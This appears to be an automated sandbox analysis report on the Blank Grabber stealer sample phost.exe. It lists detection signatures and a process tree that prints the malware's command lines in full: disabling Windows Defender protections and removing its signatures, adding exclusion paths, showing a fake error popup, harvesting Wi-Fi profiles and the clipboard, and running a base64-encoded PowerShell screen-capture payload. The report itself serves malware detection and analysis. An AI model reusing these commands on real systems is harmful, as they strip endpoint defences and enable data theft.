Edit tour
Windows
Analysis Report
phost.exe
Overview
General Information
Detection
Blank Grabber
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Blank Grabber
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Modifies the hosts file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Writes or reads registry keys via WMI
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Classification
- System is w10x64
- phost.exe (PID: 3220 cmdline:
"C:\Users\ user\Deskt op\phost.e xe" MD5: 8C43BF4445CAC5FA025B9DFD07517B6F) - phost.exe (PID: 3444 cmdline:
"C:\Users\ user\Deskt op\phost.e xe" MD5: 8C43BF4445CAC5FA025B9DFD07517B6F) - cmd.exe (PID: 1136 cmdline:
C:\Windows \system32\ cmd.exe /c "powershe ll -Comman d Add-MpPr eference - ExclusionP ath 'C:\Us ers\user\D esktop\pho st.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 1908 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 3140 cmdline:
powershell -Command Add-MpPref erence -Ex clusionPat h 'C:\User s\user\Des ktop\phost .exe' MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 5544 cmdline:
C:\Windows \system32\ cmd.exe /c "powershe ll Set-MpP reference -DisableIn trusionPre ventionSys tem $true -DisableIO AVProtecti on $true - DisableRea ltimeMonit oring $tru e -Disable ScriptScan ning $true -EnableCo ntrolledFo lderAccess Disabled -EnableNet workProtec tion Audit Mode -Forc e -MAPSRep orting Dis abled -Sub mitSamples Consent Ne verSend && powershel l Set-MpPr eference - SubmitSamp lesConsent 2 & "%Pro gramFiles% \Windows D efender\Mp CmdRun.exe " -RemoveD efinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3020 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 2912 cmdline:
powershell Set-MpPre ference -D isableIntr usionPreve ntionSyste m $true -D isableIOAV Protection $true -Di sableRealt imeMonitor ing $true -DisableSc riptScanni ng $true - EnableCont rolledFold erAccess D isabled -E nableNetwo rkProtecti on AuditMo de -Force -MAPSRepor ting Disab led -Submi tSamplesCo nsent Neve rSend MD5: 04029E121A0CFA5991749937DD22A1D9) - MpCmdRun.exe (PID: 7764 cmdline:
"C:\Progra m Files\Wi ndows Defe nder\MpCmd Run.exe" - RemoveDefi nitions -A ll MD5: B3676839B2EE96983F9ED735CD044159) - cmd.exe (PID: 2200 cmdline:
C:\Windows \system32\ cmd.exe /c "mshta "j avascript: var sh=new ActiveXOb ject('WScr ipt.Shell' ); sh.Popu p('Verify your permi ssion and try again. ', 0, 'Acc ess Denied ', 48+16); close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 1436 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - mshta.exe (PID: 3848 cmdline:
mshta "jav ascript:va r sh=new A ctiveXObje ct('WScrip t.Shell'); sh.Popup( 'Verify yo ur permiss ion and tr y again.', 0, 'Acces s Denied', 48+16);cl ose()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) - cmd.exe (PID: 2872 cmdline:
C:\Windows \system32\ cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 4324 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 7180 cmdline:
tasklist / FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - cmd.exe (PID: 7208 cmdline:
C:\Windows \system32\ cmd.exe /c "wmic csp roduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7240 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WMIC.exe (PID: 7324 cmdline:
wmic cspro duct get u uid MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - cmd.exe (PID: 7528 cmdline:
C:\Windows \system32\ cmd.exe /c "REG QUER Y HKEY_LOC AL_MACHINE \SYSTEM\Co ntrolSet00 1\Control\ Class\{4D3 6E968-E325 -11CE-BFC1 -08002BE10 318}\0000\ DriverDesc 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7540 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - reg.exe (PID: 7580 cmdline:
REG QUERY HKEY_LOCAL _MACHINE\S YSTEM\Cont rolSet001\ Control\Cl ass\{4D36E 968-E325-1 1CE-BFC1-0 8002BE1031 8}\0000\Dr iverDesc 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4) - cmd.exe (PID: 7628 cmdline:
C:\Windows \system32\ cmd.exe /c "REG QUER Y HKEY_LOC AL_MACHINE \SYSTEM\Co ntrolSet00 1\Control\ Class\{4D3 6E968-E325 -11CE-BFC1 -08002BE10 318}\0000\ ProviderNa me 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7644 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - reg.exe (PID: 7712 cmdline:
REG QUERY HKEY_LOCAL _MACHINE\S YSTEM\Cont rolSet001\ Control\Cl ass\{4D36E 968-E325-1 1CE-BFC1-0 8002BE1031 8}\0000\Pr oviderName 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4) - cmd.exe (PID: 7736 cmdline:
C:\Windows \system32\ cmd.exe /c "wmic pat h win32_Vi deoControl ler get na me" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7748 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WMIC.exe (PID: 7808 cmdline:
wmic path win32_Vide oControlle r get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - cmd.exe (PID: 7936 cmdline:
C:\Windows \system32\ cmd.exe /c "wmic pat h win32_Vi deoControl ler get na me" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7948 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WMIC.exe (PID: 7988 cmdline:
wmic path win32_Vide oControlle r get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - cmd.exe (PID: 8020 cmdline:
C:\Windows \system32\ cmd.exe /c "powershe ll -Comman d Add-MpPr eference - ExclusionP ath 'C:\Pr ogramData\ Microsoft\ Windows\St art Menu\P rograms\St artUp\?? ? .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8028 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 8068 cmdline:
powershell -Command Add-MpPref erence -Ex clusionPat h 'C:\Prog ramData\Mi crosoft\Wi ndows\Star t Menu\Pro grams\Star tUp\?? ? . scr' MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 7208 cmdline:
C:\Windows \system32\ cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7184 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 7628 cmdline:
tasklist / FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - cmd.exe (PID: 7192 cmdline:
C:\Windows \system32\ cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7180 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 7540 cmdline:
tasklist / FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - cmd.exe (PID: 2000 cmdline:
C:\Windows \system32\ cmd.exe /c "WMIC /No de:localho st /Namesp ace:\\root \SecurityC enter2 Pat h Antiviru sProduct G et display Name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7592 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WMIC.exe (PID: 7664 cmdline:
WMIC /Node :localhost /Namespac e:\\root\S ecurityCen ter2 Path AntivirusP roduct Get displayNa me MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - cmd.exe (PID: 7544 cmdline:
C:\Windows \system32\ cmd.exe /c "powershe ll Get-Cli pboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7568 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5780 cmdline:
powershell Get-Clipb oard MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 4248 cmdline:
C:\Windows \system32\ cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2188 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 7816 cmdline:
tasklist / FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - cmd.exe (PID: 7188 cmdline:
C:\Windows \system32\ cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3848 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tree.com (PID: 7936 cmdline:
tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0) - cmd.exe (PID: 7748 cmdline:
C:\Windows \system32\ cmd.exe /c "netsh wl an show pr ofile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7908 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - netsh.exe (PID: 4180 cmdline:
netsh wlan show prof ile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB) - cmd.exe (PID: 2084 cmdline:
C:\Windows \system32\ cmd.exe /c "systemin fo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8016 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - conhost.exe (PID: 7600 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - systeminfo.exe (PID: 7948 cmdline:
systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD) - cmd.exe (PID: 8120 cmdline:
C:\Windows \system32\ cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8176 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tree.com (PID: 4076 cmdline:
tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0) - cmd.exe (PID: 8108 cmdline:
C:\Windows \system32\ cmd.exe /c "REG QUER Y HKEY_LOC AL_MACHINE \SYSTEM\Cu rrentContr olSet\Serv ices\Tcpip \Parameter s /V DataB asePath" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8172 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - reg.exe (PID: 3492 cmdline:
REG QUERY HKEY_LOCAL _MACHINE\S YSTEM\Curr entControl Set\Servic es\Tcpip\P arameters /V DataBas ePath MD5: 227F63E1D9008B36BDBCC4B397780BE4) - cmd.exe (PID: 3748 cmdline:
C:\Windows \system32\ cmd.exe /c "powershe ll.exe -No Profile -E xecutionPo licy Bypas s -Encoded Command JA BzAG8AdQBy AGMAZQAgAD 0AIABAACIA DQAKAHUAcw BpAG4AZwAg AFMAeQBzAH QAZQBtADsA DQAKAHUAcw BpAG4AZwAg AFMAeQBzAH QAZQBtAC4A QwBvAGwAbA BlAGMAdABp AG8AbgBzAC 4ARwBlAG4A ZQByAGkAYw A7AA0ACgB1 AHMAaQBuAG cAIABTAHkA cwB0AGUAbQ AuAEQAcgBh AHcAaQBuAG cAOwANAAoA dQBzAGkAbg BnACAAUwB5 AHMAdABlAG 0ALgBXAGkA bgBkAG8Adw BzAC4ARgBv AHIAbQBzAD sADQAKAA0A CgBwAHUAYg BsAGkAYwAg AGMAbABhAH MAcwAgAFMA YwByAGUAZQ BuAHMAaABv AHQADQAKAH sADQAKACAA IAAgACAAcA B1AGIAbABp AGMAIABzAH QAYQB0AGkA YwAgAEwAaQ BzAHQAPABC AGkAdABtAG EAcAA+ACAA QwBhAHAAdA B1AHIAZQBT AGMAcgBlAG UAbgBzACgA KQANAAoAIA AgACAAIAB7 AA0ACgAgAC AAIAAgACAA IAAgACAAdg BhAHIAIABy AGUAcwB1AG wAdABzACAA PQAgAG4AZQ B3ACAATABp AHMAdAA8AE IAaQB0AG0A YQBwAD4AKA ApADsADQAK ACAAIAAgAC AAIAAgACAA IAB2AGEAcg AgAGEAbABs AFMAYwByAG UAZQBuAHMA IAA9ACAAUw BjAHIAZQBl AG4ALgBBAG wAbABTAGMA cgBlAGUAbg BzADsADQAK AA0ACgAgAC AAIAAgACAA IAAgACAAZg BvAHIAZQBh AGMAaAAgAC gAUwBjAHIA ZQBlAG4AIA BzAGMAcgBl AGUAbgAgAG kAbgAgAGEA bABsAFMAYw ByAGUAZQBu AHMAKQANAA oAIAAgACAA IAAgACAAIA AgAHsADQAK ACAAIAAgAC AAIAAgACAA IAAgACAAIA AgAHQAcgB5 AA0ACgAgAC AAIAAgACAA IAAgACAAIA AgACAAIAB7 AA0ACgAgAC AAIAAgACAA IAAgACAAIA AgACAAIAAg ACAAIAAgAF IAZQBjAHQA YQBuAGcAbA BlACAAYgBv AHUAbgBkAH MAIAA9ACAA cwBjAHIAZQ BlAG4ALgBC AG8AdQBuAG QAcwA7AA0A CgAgACAAIA AgACAAIAAg ACAAIAAgAC AAIAAgACAA IAAgAHUAcw BpAG4AZwAg ACgAQgBpAH QAbQBhAHAA IABiAGkAdA BtAGEAcAAg AD0AIABuAG UAdwAgAEIA aQB0AG0AYQ BwACgAYgBv AHUAbgBkAH MALgBXAGkA ZAB0AGgALA AgAGIAbwB1 AG4AZABzAC 4ASABlAGkA ZwBoAHQAKQ ApAA0ACgAg ACAAIAAgAC AAIAAgACAA IAAgACAAIA AgACAAIAAg AHsADQAKAC AAIAAgACAA IAAgACAAIA AgACAAIAAg ACAAIAAgAC AAIAAgACAA IAB1AHMAaQ BuAGcAIAAo AEcAcgBhAH AAaABpAGMA cwAgAGcAcg BhAHAAaABp AGMAcwAgAD 0AIABHAHIA YQBwAGgAaQ BjAHMALgBG AHIAbwBtAE kAbQBhAGcA ZQAoAGIAaQ B0AG0AYQBw ACkAKQANAA oAIAAgACAA IAAgACAAIA AgACAAIAAg ACAAIAAgAC AAIAAgACAA IAAgAHsADQ AKACAAIAAg ACAAIAAgAC AAIAAgACAA IAAgACAAIA AgACAAIAAg ACAAIAAgAC AAIAAgAGcA cgBhAHAAaA BpAGMAcwAu AEMAbwBwAH kARgByAG8A bQBTAGMAcg BlAGUAbgAo AG4AZQB3AC AAUABvAGkA bgB0ACgAYg BvAHUAbgBk AHMALgBMAG UAZgB0ACwA IABiAG8AdQ BuAGQAcwAu AFQAbwBwAC kALAAgAFAA bwBpAG4AdA AuAEUAbQBw AHQAeQAsAC AAYgBvAHUA bgBkAHMALg BTAGkAegBl ACkAOwANAA oAIAAgACAA IAAgACAAIA AgACAAIAAg ACAAIAAgAC AAIAAgACAA IAAgAH0ADQ AKAA0ACgAg ACAAIAAgAC AAIAAgACAA IAAgACAAIA AgACAAIAAg ACAAIAAgAC AAcgBlAHMA dQBsAHQAcw AuAEEAZABk ACgAKABCAG kAdABtAGEA cAApAGIAaQ B0AG0AYQBw AC4AQwBsAG 8AbgBlACgA KQApADsADQ AKACAAIAAg ACAAIAAgAC AAIAAgACAA IAAgACAAIA AgACAAfQAN AAoAIAAgAC AAIAAgACAA IAAgACAAIA AgACAAfQAN AAoAIAAgAC AAIAAgACAA IAAgACAAIA AgACAAYwBh AHQAYwBoAC AAKABFAHgA YwBlAHAAdA